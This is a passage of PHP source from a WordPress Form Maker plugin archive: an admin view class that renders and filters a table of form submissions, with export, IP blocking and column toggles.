  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/views/FMViewSubmissions_fmc.php000060400000603412152434416630013735 0ustar00<?php

class  FMViewSubmissions_fmc {
	////////////////////////////////////////////////////////////////////////////////////////
	// Events                                                                             //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Constants                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	////////////////////////////////////////////////////////////////////////////////////////
	// Variables                                                                          //
	////////////////////////////////////////////////////////////////////////////////////////
	private $model;

	////////////////////////////////////////////////////////////////////////////////////////
	// Constructor & Destructor                                                           //
	////////////////////////////////////////////////////////////////////////////////////////
	public function __construct($model) {
	$this->model = $model;
	}

	////////////////////////////////////////////////////////////////////////////////////////
	// Public Methods                                                                     //
	////////////////////////////////////////////////////////////////////////////////////////
	public function display($form_id) {
		
		
		global $wpdb;
		$forms = $this->model->get_form_titles();
		$statistics = $this->model->get_statistics($form_id);
		$labels_parameters = $this->model->get_labels_parameters($form_id);

		$sorted_labels_id = $labels_parameters[0]; 
		$sorted_label_types = $labels_parameters[1]; 
		$lists = $labels_parameters[2];
		$sorted_label_names = $labels_parameters[3]; 
		$sorted_label_names_original = $labels_parameters[4]; 
		$rows = ((isset($labels_parameters[5])) ? $labels_parameters[5] : NULL);
		$group_ids = ((isset($labels_parameters[6])) ? $labels_parameters[6] : NULL);
		$where_choices = $labels_parameters[7];	
		$order_by = (isset($_POST['order_by']) ? esc_html(stripslashes($_POST['order_by'])) : 'group_id');
		$asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'asc') ? 'asc' : 'desc');
		$style_id = $this->model->hide_or_not($lists['hide_label_list'], '@submitid@'); 
		$style_date = $this->model->hide_or_not($lists['hide_label_list'], '@submitdate@');
		$style_ip = $this->model->hide_or_not($lists['hide_label_list'], '@submitterip@');

		$style_username = $this->model->hide_or_not($lists['hide_label_list'], '@submitterusername@');
		$style_useremail = $this->model->hide_or_not($lists['hide_label_list'], '@submitteremail@');

		$oder_class_default = "manage-column column-autor sortable desc";
		$oder_class = "manage-column column-title sorted " . $asc_or_desc; 
		$ispaypal = FALSE;
		$temp = array();
		$m = count($sorted_label_names);
		$n = count($rows);
		$group_id_s = array();	
		$group_id_s = $this->model->sort_group_ids(count($sorted_label_names),$group_ids);  
		$ka_fielderov_search = (($lists['ip_search'] || $lists['startdate'] || $lists['enddate'] || $lists['username_search'] || $lists['useremail_search'] || $lists['id_search']) ? TRUE : FALSE);
		$is_stats = false;
		$blocked_ips = $this->model->blocked_ips();
		
		if (defined('WD_FM_PDF') && is_plugin_active(constant('WD_FM_PDF'))) {
			require_once(WD_FM_PDF_DIR.'/model.php');
			$pdf_data = WD_FM_PDF_model::get_pdf_data($form_id);
		}
		$subs_count = $this->model->get_subs_count($form_id);
		$chosen_form_title = '';
		if ($forms) { 
			foreach($forms as $form) {
				if ($form_id == $form->id) { 
					$chosen_form_title = $form->title;
				}
			}
		}
		?>
		<script type="text/javascript">
			function export_submissions(type, limit) {
			var progressbar = jQuery( "#fm-progressbar" );
			var progressLabel = jQuery( ".fm-progress-label" );
		 
			progressbar.progressbar({
				max: <?php echo $subs_count; ?>
			});
			
			jQuery.ajax({
			    type: "POST",  
				url:"<?php echo add_query_arg(array('form_id' => $form_id, 'send_header' => 0), admin_url('admin-ajax.php')); ?>&action=generete_"+type+"_fmc&limitstart="+limit,
				beforeSend: function() {
					if(<?php echo $subs_count; ?> >= 1000 )
						jQuery('.fm_modal').show();
			    },
			    success: function(data) {
					if(limit < <?php echo $subs_count; ?>) {
						limit += 1000;
						export_submissions(type, limit);
						progressbar.progressbar( "value",  limit);
						loaded_percent = Math.round((progressbar.progressbar( "value" ) * 100)/ parseInt(<?php echo $subs_count; ?>));
						progressLabel.text( loaded_percent + ' %');
						progressbarValue = progressbar.find( ".fm-progress-label" );
						if( loaded_percent >= 46 ) {
							progressbarValue.css({
								"color": '#fff',
							});
						}
						else {
							progressbarValue.css({
								"color": '#444',
							});
						}
					}
					else{
						jQuery('.fm_modal').hide();
						progressbar.progressbar( "value",  0);
						progressLabel.text( 'Loading ...' );
						progressbarValue = progressbar.find( ".fm-progress-label" );
						progressbarValue.css({
							"color": '#444',
						});
						window.location = "<?php echo add_query_arg(array('form_id' => $form_id, 'send_header' => 1), admin_url('admin-ajax.php')); ?>&action=generete_"+type+"_fmc&limitstart="+limit;
					}
			    }
			});
		}
	
			function clickLabChBAll(ChBAll) {
				<?php
					if (isset($sorted_label_names)) {
						$templabels = array_merge(array(
							'submitid',
							'submitdate',
							'submitterip',
							'submitterusername',
							'submitteremail'
						), $sorted_labels_id);
						$sorted_label_names_for_check = array_merge(array(
							'ID',
							'Submit date',
							"Submitter's IP",
							"Submitter's Username",
							"Submitter's Email Address"
						), $sorted_label_names_original);
					}
					else {
						$templabels = array(
							'submitid',
							'submitdate',
							'submitterip',
							'submitterusername',
							'submitteremail'
						);
						$sorted_label_names_for_check = array(
							'ID',
							'Submit date',
							"Submitter's IP",
							'Submitter\'s Username',
							'Submitter\'s Email Address'
						);
					}
				?>
				if (ChBAll.checked) {
					document.forms.admin_form.hide_label_list.value = '';
					for (i = 0; i <= ChBAll.form.length; i++) {
						if (typeof(ChBAll.form[i]) != "undefined") {
							if (ChBAll.form[i].type == "checkbox") {
								ChBAll.form[i].checked = true;
							}
						}
					}
				}
				else {
					document.forms.admin_form.hide_label_list.value = '@<?php echo implode($templabels, '@@') ?>@' + '@payment_info@';
					for (i = 0; i <= ChBAll.form.length; i++) {
						if (typeof(ChBAll.form[i]) != "undefined") {
							if (ChBAll.form[i].type == "checkbox") {
								ChBAll.form[i].checked = false;
							}
						}
					}
				}
				renderColumns();
			}
			
			function remove_all() {
				if(document.getElementById('startdate'))
					document.getElementById('startdate').value='';
				if(document.getElementById('enddate'))
					document.getElementById('enddate').value='';
				if(document.getElementById('id_search'))
					document.getElementById('id_search').value='';
				if(document.getElementById('ip_search'))
					document.getElementById('ip_search').value='';
				if(document.getElementById('username_search'))
					document.getElementById('username_search').value='';
				if(document.getElementById('useremail_search'))
					document.getElementById('useremail_search').value='';
				<?php
				$n = count($rows);
				for ($i = 0; $i < count($sorted_label_names); $i++) {
					if ($sorted_label_types[$i] != "type_mark_map") { ?>
						document.getElementById('<?php echo $form_id . '_' . $sorted_labels_id[$i] . '_search'; ?>').value='';
						<?php
					}
				}
				?>
			}
			function show_hide_filter() {
				if (document.getElementById('fields_filter').style.display == "none") {
					document.getElementById('fields_filter').style.display = '';
				}
				else {
					document.getElementById('fields_filter').style.display = "none";
				}
				return false;
			}
			jQuery(document).ready(function () { 
				jQuery('.theme-detail').click(function () {
					jQuery(this).siblings('.themedetaildiv').toggle();
					return false;
				});
			});
		</script>
		<div class="fm_modal"> 
			<div id="fm-progressbar" >
				<div class="fm-progress-label">Loading...</div>
			</div> 
		</div> 
		<div class="export_progress">
			<span class="exp_count"><?php echo $subs_count; ?></span> left from <?php echo $subs_count; ?>
		</div> 
		<div id="sbox-overlay" onclick="toggleChBDiv(false);">
		</div>
		<div id="ChBDiv">
			<form action="#">
				<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
				<p style="font-weight: bold; font-size: 18px; margin-top: 0px;">Select Columns</p>
				<div class="fm_check_labels"><input type="checkbox" <?php echo ($lists['hide_label_list'] === '') ? 'checked="checked"' : ''; ?> onclick="clickLabChBAll(this)" id="ChBAll"/><label for="ChBAll"> All</label></div>
				<?php
				foreach ($templabels as $key => $curlabel) {
					if (strpos($lists['hide_label_list'], '@' . $curlabel . '@') === FALSE) {
						?>
						<div class="fm_check_labels"><input type="checkbox" checked="checked" onclick="clickLabChB('<?php echo $curlabel; ?>', this)" id="fm_check_id_<?php echo $curlabel; ?>" /><label for="fm_check_id_<?php echo $curlabel; ?>"> <?php echo stripslashes($sorted_label_names_for_check[$key]); ?></label></div>
						<?php
					}		  
					else {
						?>
						<div class="fm_check_labels"><input type="checkbox" onclick="clickLabChB('<?php echo $curlabel; ?>', this)" id="fm_check_id_<?php echo $curlabel; ?>"/><label for="fm_check_id_<?php echo $curlabel; ?>"> <?php echo stripslashes($sorted_label_names_for_check[$key]); ?></label></div>
						<?php  
					}
				}
				$ispaypal = FALSE;
				for ($i = 0; $i < count($sorted_label_names); $i++) {
					if ($sorted_label_types[$i] == 'type_paypal_payment_status') {
						$ispaypal = TRUE;
					}
				}
				if ($ispaypal) {
					?>
					<div class="fm_check_labels">
						<input type="checkbox" onclick="clickLabChB('payment_info', this)" id="fm_check_payment_info" <?php echo (strpos($lists['hide_label_list'], '@payment_info@') === FALSE) ? 'checked="checked"' : ''; ?> />
						<label for="fm_check_payment_info"> Payment Info</label>
					</div>
					<?php
				}
				?>
				<div style="text-align: center; padding-top: 20px;">
					<button onclick="toggleChBDiv(false); return false;" style="background: #4EC0D9; width: 78px; height: 32px; border: 1px solid #4EC0D9; border-radius: 0px; color: #fff; cursor: pointer;">Done</button>
				</div>
			</form>
		</div>
		<div class="fm-user-manual">
			This section allows you to view and manage form submissions.
			<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-7.html">Read More in User Manual</a>
		</div>
		<div class="fm-upgrade-pro">
			<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
				<div class="fm-upgrade-img">
					UPGRADE TO PRO VERSION 
					<span></span>
				</div>
			</a>
		</div>
		<div class="fm-clear"></div>
		<form action="admin.php?page=submissions_fmc" method="post" id="admin_form" name="admin_form">
			<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
			<input type="hidden" name="option" value="com_formmaker" />
			<input type="hidden" id="task" name="task" value="" />
			<input type="hidden" id="current_id" name="current_id" value="" />
			<input type="hidden" name="asc_or_desc" id="asc_or_desc" value="<?php echo $asc_or_desc; ?>" />
			<input type="hidden" name="order_by" id="order_by" value="<?php echo $order_by; ?>" />
			
			<div class="fm-submissions-page">
				<div class="submissions-actions">
					<div class="fm-form-title">
						<?php echo $chosen_form_title; ?>	
					</div>
					<div class="fm-page-actions">
						<button class="fm-button block-button small" onclick="fm_set_input_value('task', 'block_ip'); fm_form_submit(event, 'admin_form');">
							<span></span>
							Block IP
						</button>
						<button class="fm-button unblock-button medium" onclick="fm_set_input_value('task', 'unblock_ip'); fm_form_submit(event, 'admin_form');">
							<span></span>
							Unblock IP
						</button>
						<button class="fm-button delete-button small" onclick="if (confirm('Do you want to delete selected items?')) { fm_set_input_value('task', 'delete_all'); fm_form_submit(event, 'admin_form'); } else { return false; }">
							<span></span>
							Delete
						</button>
					</div>
				</div>
				<div class="submissions-toolbar">
					<div class="submissions-tools">
						<select name="form_id" id="form_id" onchange="document.admin_form.submit();">
							<option value="0" selected="selected"> - Select a Form - </option>
							<?php if ($forms) { 
								foreach($forms as $form) {
									?>
									<option value="<?php echo $form->id; ?>" <?php if ($form_id == $form->id) { echo 'selected="selected"'; }?>> <?php echo $form->title ?> </option>
									<?php
								}
							} ?>
						</select>
						<div class="fm-reports">
							<div class="fm-tools-button"><div class="fm-total_entries"><?php echo $statistics["total_entries"]; ?></div>Entries</div>
							<div class="fm-tools-button"><div class="fm-total_rate"><?php echo $statistics["conversion_rate"]; ?></div>Conversion Rate</div>
							<div class="fm-tools-button"><div class="fm-total_views"><?php echo $statistics["total_views"] ? $statistics["total_views"] : 0; ?></div>Views</div>
						</div>
						
						<div class="fm-export-tools">
							<span class="exp_but_span">Export to</span>
							&nbsp;
							<button class="fm-tools-button" onclick="export_submissions('csv', 0); return false;">
								CSV
							</button>
							<button class="fm-tools-button" onclick="export_submissions('xml', 0); return false;">
								XML
							</button>
						</div>
					</div>
				</div>
				<div class="tablenav top">
					<div class="fm-filters">
						<div class="fm-search-tools">
							<input type="hidden" name="hide_label_list" value="<?php echo $lists['hide_label_list']; ?>"> 
							<button class="fm-icon show-filter-icon" onclick="show_hide_filter(); return false;" title="Show Filters">
								<span></span>
							</button>
							<button class="fm-icon search-icon" onclick="fm_form_submit(event, 'admin_form'); return false;" title="Search">
							</button>
							<button class="fm-icon reset-icon" onclick="remove_all(); fm_form_submit(event, 'admin_form'); return false;" title="Reset">
							</button>
						</div>
						<div class="fm-add-remove">
							<?php if (isset($sorted_label_names)) { ?>
							<button class="fm-button" onclick="toggleChBDiv(true); return false;">
								Add/Remove Columns
							</button>
							<?php WDW_FMC_Library::html_page_nav($lists['total'], $lists['limit'], 'admin_form'); ?>
							<?php } ?>
							<input type="hidden" name="pagination_clicked" id="pagination_clicked" value=""/>
						</div>
					</div>
					<div class="fm-clear"></div>
				</div>
				
				<div class="fm-loading-container" style="display:none;">
					<div class="fm-loading-content">
					</div>
				</div>
				<div class="submit_content" id="fm-scroll" style="width: 100%;">
					<table class="wp-list-table widefat fixed posts table_content">
						<thead>
							<tr>
								<?php if (defined('WD_FM_PDF') && is_plugin_active(constant('WD_FM_PDF'))): ?> 
								<th class="table_small_col count_col sub-align">PDF</th>
								<?php endif; ?>
								<th class="table_small_col count_col sub-align">#</th>
								<th scope="col" id="cb" class="manage-column column-cb check-column table_small_col sub-align form_check"><input id="check_all" type="checkbox"></th>
								<th scope="col" id="submitid_fc" class="table_small_col sub-align submitid_fc <?php if ($order_by == "group_id") echo $oder_class; else echo $oder_class_default; ?>" <?php echo $style_id;?>>
									<a href="" class="sub_id" onclick="fm_set_input_value('order_by', 'group_id');
													   fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'group_id' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
													   fm_form_submit(event, 'admin_form')">
										<span>ID</span>
										<span class="sorting-indicator" style="margin-top: 8px;"></span>
									</a>
								</th>
								<th class="table_small_col sub-align">Edit</th>
								<th class="table_small_col sub-align">Delete</th>
								<th scope="col" id="submitdate_fc" class="table_large_col submitdate_fc <?php if ($order_by == "date") echo $oder_class; else echo $oder_class_default; ?>" <?php echo $style_date;?>>
									<a href="" onclick="fm_set_input_value('order_by', 'date');
										fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'date' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
										fm_form_submit(event, 'admin_form')">
										<span>Submit date</span>
										<span class="sorting-indicator"></span>
									</a>
								</th>
								<th scope="col" id="submitterip_fc" class="table_medium_col_uncenter submitterip_fc <?php if ($order_by == "ip")echo $oder_class; else echo $oder_class_default;  ?>" <?php echo $style_ip;?>>
									<a href="" onclick="fm_set_input_value('order_by', 'ip');
										fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'ip' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
										fm_form_submit(event, 'admin_form')">
										<span>Submitter's IP</span>
										<span class="sorting-indicator"></span>
									</a>
								</th>	
								<th scope="col" id="submitterusername_fc" class="table_medium_col_uncenter submitterusername_fc <?php if ($order_by == "display_name")echo $oder_class; else echo $oder_class_default;  ?>" <?php echo $style_username;?>>
									<a href="" onclick="fm_set_input_value('order_by', 'display_name');
										fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'display_name' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
										fm_form_submit(event, 'admin_form')">
										<span>Submitter's Username</span>
										<span class="sorting-indicator"></span>
									</a>
								</th>	
								<th scope="col" id="submitteremail_fc" class="table_medium_col_uncenter submitteremail_fc <?php if ($order_by == "user_email")echo $oder_class; else echo $oder_class_default;  ?>" <?php echo $style_useremail ;?>>
									<a href="" onclick="fm_set_input_value('order_by', 'user_email');
										fm_set_input_value('asc_or_desc', '<?php echo (($order_by == 'user_email' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>');
										fm_form_submit(event, 'admin_form')">
										<span>Submitter's Email Address</span>
										<span class="sorting-indicator"></span>
									</a>
								</th>	
								<?php
								for ($i = 0; $i < count($sorted_label_names); $i++) {
									$styleStr = $this->model->hide_or_not($lists['hide_label_list'], $sorted_labels_id[$i]); 
									$styleStr2 = $this->model->hide_or_not($lists['hide_label_list'] , '@payment_info@');		   
									$field_title = $this->model->get_type_address($sorted_label_types[$i], $sorted_label_names_original[$i]);
									if ($sorted_label_types[$i] == 'type_paypal_payment_status') {
										$ispaypal = TRUE;
										?>
										<th <?php echo $styleStr; ?> id="<?php echo $sorted_labels_id[$i] . '_fc'; ?>" class="table_large_col <?php echo $sorted_labels_id[$i] . '_fc'; if ($order_by == $sorted_labels_id[$i] . "_field") echo $oder_class . '"';else echo $oder_class_default . '"'; ?>">
											<a href="" onclick="fm_set_input_value('order_by', '<?php echo $sorted_labels_id[$i] . '_field'; ?>'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == $sorted_labels_id[$i] . '_field' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'admin_form')">	
												<span><?php echo $field_title; ?></span>
												<span class="sorting-indicator"></span>
											</a>
										</th>
										<th class="table_large_col payment_info_fc" <?php echo $styleStr2; ?>>Payment Info</th>
										<?php  
									}
									else {
										?>
										<th <?php echo $styleStr; ?> id="<?php  echo $sorted_labels_id[$i] . '_fc';?>" class="<?php echo ($sorted_label_types[$i] == 'type_mark_map' || $sorted_label_types[$i] == 'type_matrix') ? 'table_large_col ' : ''; echo $sorted_labels_id[$i] . '_fc'; if ($order_by == $sorted_labels_id[$i] . "_field") echo $oder_class . '"';else echo $oder_class_default . '"'; ?>">
											<a href="" onclick="fm_set_input_value('order_by', '<?php echo $sorted_labels_id[$i] . '_field'; ?>'); fm_set_input_value('asc_or_desc', '<?php echo (($order_by == $sorted_labels_id[$i] . '_field' && $asc_or_desc == 'asc') ? 'desc' : 'asc'); ?>'); fm_form_submit(event, 'admin_form')">
												<span><?php echo $field_title; ?></span>
												<span class="sorting-indicator"></span>
											</a>
										</th>
										<?php
									}
								}			
								?>		           
							</tr>
							<tr id="fields_filter" style="display: none;">
								<th></th>
								<th></th> 
								<th class="submitid_fc" <?php echo $style_id; ?> >
									<input type="text" name="id_search" id="id_search" value="<?php echo $lists['id_search'] ?>" onChange="this.form.submit();" style="width:30px"/>
								</th>
								<th></th>
								<th></th>
								<th width="150" class="submitdate_fc" <?php echo $style_date; ?>>
									<table align="center" style="margin:auto" class="simple_table">
										<tr class="simple_table">
											<td class="simple_table" style="text-align: left;">From:</td>
											<td style="text-align: center;" class="simple_table">
												<input class="inputbox" type="text" name="startdate" id="startdate" size="10" maxlength="10" value="<?php echo $lists['startdate']; ?>" />
											</td>
											<td style="text-align: center;" class="simple_table">
												<input type="reset" style="width: 22px; border-radius: 3px !important;" class="button" value="..." onclick="return showCalendar('startdate','%Y-%m-%d');" />
											</td>
										</tr>
										<tr class="simple_table">
											<td style="text-align: left;" class="simple_table">To:</td>
											<td style="text-align: center;" class="simple_table">
												<input class="inputbox" type="text" name="enddate" id="enddate" size="10" maxlength="10" value="<?php echo $lists['enddate']; ?>" />
											</td>
											<td style="text-align: center;" class="simple_table">
												<input type="reset" style="width: 22px; border-radius: 3px !important;" class="button" value="..." onclick="return showCalendar('enddate','%Y-%m-%d');" />
											</td>
										</tr>
									</table>
								</th>
								<th class="table_medium_col_uncenter submitterip_fc" <?php echo $style_ip; ?>>
									<input type="text" name="ip_search" id="ip_search" value="<?php echo $lists['ip_search']; ?>" onChange="this.form.submit();" />
								</th>
								<th class="table_medium_col_uncenter submitterusername_fc" <?php echo $style_username; ?>>
									<input type="text" name="username_search" id="username_search" value="<?php echo $lists['username_search']; ?>" onChange="this.form.submit();" />
								</th>
								<th class="table_medium_col_uncenter submitteremail_fc" <?php echo $style_useremail; ?>>
									<input type="text" name="useremail_search" id="useremail_search" value="<?php echo $lists['useremail_search']; ?>" onChange="this.form.submit();" />
								</th>
								<?php
								for ($i = 0; $i < count($sorted_label_names); $i++) {
									$styleStr = $this->model->hide_or_not($lists['hide_label_list'], $sorted_labels_id[$i]);
									if (!$ka_fielderov_search) {
										if ($lists[$form_id . '_' . $sorted_labels_id[$i] . '_search']) {
											$ka_fielderov_search = TRUE;
										}
									}	
									switch ($sorted_label_types[$i]) {
										case 'type_mark_map': ?>
											<th class="table_large_col <?php echo $sorted_labels_id[$i]; ?>_fc" <?php echo $styleStr; ?>></th>
											<?php
										break;
										case 'type_paypal_payment_status': ?>
											<th class="table_large_col <?php echo $sorted_labels_id[$i]; ?>_fc" <?php echo $styleStr; ?>>
												<select style="font-size: 11px; margin: 0; padding: 0; height: inherit;" name="<?php echo $form_id . '_' . $sorted_labels_id[$i]; ?>_search" id="<?php echo $form_id.'_'.$sorted_labels_id[$i]; ?>_search" onChange="this.form.submit();" value="<?php echo $lists[$form_id.'_'.$sorted_labels_id[$i].'_search']; ?>" >
													<option value="" ></option>
													<option value="canceled" >Canceled</option>
													<option value="cleared" >Cleared</option>
													<option value="cleared by payment review" >Cleared by payment review</option>
													<option value="completed" >Completed</option>
													<option value="denied" >Denied</option>
													<option value="failed" >Failed</option>
													<option value="held" >Held</option>
													<option value="in progress" >In progress</option>
													<option value="on hold" >On hold</option>
													<option value="paid" >Paid</option>
													<option value="partially refunded" >Partially refunded</option>
													<option value="pending verification" >Pending verification</option>
													<option value="placed" >Placed</option>
													<option value="processing" >Processing</option>
													<option value="refunded" >Refunded</option>
													<option value="refused" >Refused</option>
													<option value="removed" >Removed</option>
													<option value="returned" >Returned</option>
													<option value="reversed" >Reversed</option>
													<option value="temporary hold" >Temporary hold</option>
													<option value="unclaimed" >Unclaimed</option>
												</select>	
												<script> 
													var element = document.getElementById('<?php echo $form_id.'_'.$sorted_labels_id[$i]; ?>_search');
													element.value = '<?php echo $lists[$form_id.'_'.$sorted_labels_id[$i].'_search']; ?>';
												</script>
											</th>
											<th class="table_large_col  payment_info_fc" <?php echo $styleStr2; ?>></th>
											<?php				
										break;
										default: ?>
											<th class="<?php echo $sorted_labels_id[$i]; ?>_fc" <?php echo $styleStr; ?>>
												<input name="<?php echo $form_id .'_' . $sorted_labels_id[$i].'_search'; ?>" id="<?php echo $form_id .'_' . $sorted_labels_id[$i].'_search'; ?>" type="text" value="<?php echo $lists[$form_id.'_'.$sorted_labels_id[$i].'_search']; ?>"  onChange="this.form.submit();" >
											</th>
											<?php	
										break;			
									}
								}
								?>
							</tr>
						</thead>
						<?php
						$k = 0;
						for ($www = 0, $qqq = count($group_id_s); $www < $qqq; $www++) {
							$i = $group_id_s[$www];
							$alternate = (!isset($alternate) || $alternate == 'class="alternate"') ? '' : 'class="alternate"';
							$temp = $this->model->array_for_group_id($group_id_s[$www], $rows);
							$data = $temp[0];
							$userinfo=get_userdata($data->user_id_wd);
							$useremail=$userinfo ? $userinfo->user_email : "";
							$username=$userinfo ? $userinfo->display_name : "";
							?>
							<tr <?php echo $alternate; ?>>
								<?php if (defined('WD_FM_PDF') && is_plugin_active(constant('WD_FM_PDF'))): ?> 
								<td class="table_small_col pdf_col sub-align">
									<?php if($pdf_data && isset($pdf_data[$group_id_s[$www]])): ?> 
									<a href="<?php echo site_url().'/'.$pdf_data[$group_id_s[$www]]; ?>" style="display: block;" download><img src="<?php echo WD_FM_PDF_URL . '/images/pdf-icon.png'; ?>" /></a>
									<?php endif; ?>
								</td>
								<?php endif; ?>
								<td class="table_small_col count_col sub-align"><?php echo $www + 1; ?></td>
								<td class="check-column table_small_col sub-align" style="padding: 0;">
									<input type="checkbox" name="post[]" value="<?php echo $data->group_id; ?>">
								</td>   
								<td class="table_small_col sub-align submitid_fc" id="submitid_fc" <?php echo $style_id; ?>>
									<a href="" onclick="fm_set_input_value('task', 'edit');						   fm_set_input_value('current_id',<?php echo $data->group_id; ?>); fm_form_submit(event, 'admin_form');" >
										<?php echo $data->group_id; ?>
									</a>
								</td> 
								<td class="table_small_col sub-align">
									<a href="" onclick="fm_set_input_value('task', 'edit');						   fm_set_input_value('current_id',<?php echo $data->group_id; ?>); fm_form_submit(event, 'admin_form');">Edit
									</a>
								</td>
								<td class="table_small_col sub-align">
									<a href="" onclick="if (confirm('Do you want to delete selected item(s)?')) { fm_set_input_value('task', 'delete'); fm_set_input_value('current_id',<?php echo $data->group_id; ?>); fm_form_submit(event, 'admin_form'); } else { return false; }">Delete
									</a>
								</td>		 
								<td  class="table_large_col submitdate_fc sub-align" id="submitdate_fc" <?php echo $style_date; ?>>
									<a href="" onclick="fm_set_input_value('task', 'edit'); fm_set_input_value('current_id',<?php echo $data->group_id; ?>); fm_form_submit(event, 'admin_form');" ><?php echo $data->date ;?>
									</a>
								</td>
								<td class="table_medium_col_uncenter submitterip_fc sub-align" id="submitterip_fc" <?php echo $style_ip; ?>>
									<a class="thickbox-preview" href="<?php echo add_query_arg(array('action' => 'fromipinfoinpopup_fmc', 'data_ip' => $data->ip, 'width' => '400', 'height' => '300', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>" title="Show submitter information" <?php echo (!in_array($data->ip, $blocked_ips)) ? '' : 'style="color: #FF0000;"'; ?>><?php echo $data->ip; ?></a>
								</td>
								<td  class="table_large_col submitterusername_fc sub-align" id="submitterusername_fc" <?php echo $style_username; ?>>
									<?php   echo  $username; ?>
								</td>
								<td  class="table_large_col submitteremail_fc sub-align" id="submitteremail_fc" <?php echo $style_useremail; ?>>
									<?php  echo $useremail; ?>
								</td>
								<?php
								for ($h = 0; $h < $m; $h++) {
									$not_label = TRUE;
									for ($g = 0; $g < count($temp); $g++) {
										$styleStr = $this->model->hide_or_not($lists['hide_label_list'], $sorted_labels_id[$h]);
										if ($temp[$g]->element_label == $sorted_labels_id[$h]) {
											if (strpos($temp[$g]->element_value, "***map***")) {
												$map_params = explode('***map***', $temp[$g]->element_value);
												?>
												<td class="table_large_col <?php echo $sorted_labels_id[$h]; ?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
													<a class="thickbox-preview" href="<?php echo add_query_arg(array('action' => 'frommapeditinpopup_fmc', 'long' => $map_params[0], 'lat' => $map_params[1], 'width' => '620', 'height' => '550', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>" title="Show on Map">Show on Map</a>
												</td>
												<?php 
											}
											elseif (strpos($temp[$g]->element_value, "*@@url@@*")) {
												?>
												<td class="<?php echo $sorted_labels_id[$h]; ?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
													<?php
													$new_files = explode("*@@url@@*", $temp[$g]->element_value);
													foreach ($new_files as $new_file) {
														if ($new_file) {
															$new_filename = explode('/', $new_file);
															$new_filename = $new_filename[count($new_filename) - 1];
															?>
															<a target="_blank" class="fm_fancybox" rel="group_<?php echo $www; ?>" href="<?php echo $new_file; ?>"><?php echo $new_filename; ?></a><br />
															<?php
														}
													}
													?>
												</td>
												<?php
											}
											elseif (strpos($temp[$g]->element_value, "***star_rating***")) {
												$view_star_rating_array = $this->model->view_for_star_rating($temp[$g]->element_value, $temp[$g]->element_label);
												$stars = $view_star_rating_array[0];
												?>
												<td align="center" class="<?php echo $sorted_labels_id[$h];?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>><?php echo $stars; ?></td>
												<?php  
											}
											elseif (strpos($temp[$g]->element_value, "***matrix***")) {
												?>   
												<td class="table_large_col <?php echo $sorted_labels_id[$h];?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
													<a class="thickbox-preview" href="<?php echo add_query_arg(array('action' => 'show_matrix', 'matrix_params' => $temp[$g]->element_value, 'width' => '620', 'height' => '550', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>" title="Show Matrix">Show Matrix</a>
												</td>
												<?php
											}
											elseif (strpos($temp[$g]->element_value, "@@@") !== FALSE || $temp[$g]->element_value == "@@@" || $temp[$g]->element_value == "@@@@@@@@@") {
												?>
												<td class="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
													<p><?php echo str_replace("@@@", " ", $temp[$g]->element_value); ?></p>
												</td>
												<?php
											}
											elseif (strpos($temp[$g]->element_value, "***grading***")) {
												$view_grading_array = $this->model->view_for_grading($temp[$g]->element_value);
												$items = $view_grading_array[0];
												?>
												<td class="<?php echo $sorted_labels_id[$h];?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
													<p><?php echo $items; ?></p>
												</td>
												<?php
											}
											else {
												if (strpos($temp[$g]->element_value, "***quantity***")) {
													$temp[$g]->element_value = str_replace("***quantity***", " ", $temp[$g]->element_value);
												}
												if (strpos($temp[$g]->element_value, "***property***")) {
													$temp[$g]->element_value = str_replace("***property***", " ", $temp[$g]->element_value);
												}

												if($sorted_label_types[$h]=="type_submitter_mail"){	
													$query = $wpdb->prepare('SELECT id FROM ' . $wpdb->prefix . 'formmaker_submits WHERE form_id ="%d" AND group_id="%d" AND element_value="verified**%d"', $form_id, $i, $sorted_labels_id[$h]);
													$isverified = $wpdb->get_var($query);
								
													if($isverified) { ?>
														<td class="<?php echo $sorted_labels_id[$h];?>_fc" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
															<p><?php echo $temp[$g]->element_value; ?> <span style="color:#2DA068;">( Verified <img src="<?php echo WD_FMC_URL . '/images/verified.png'; ?>" /> )</span></p>
														</td>
													<?php }	
													else {?>
														<td class="<?php echo $sorted_labels_id[$h];?>_fc" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
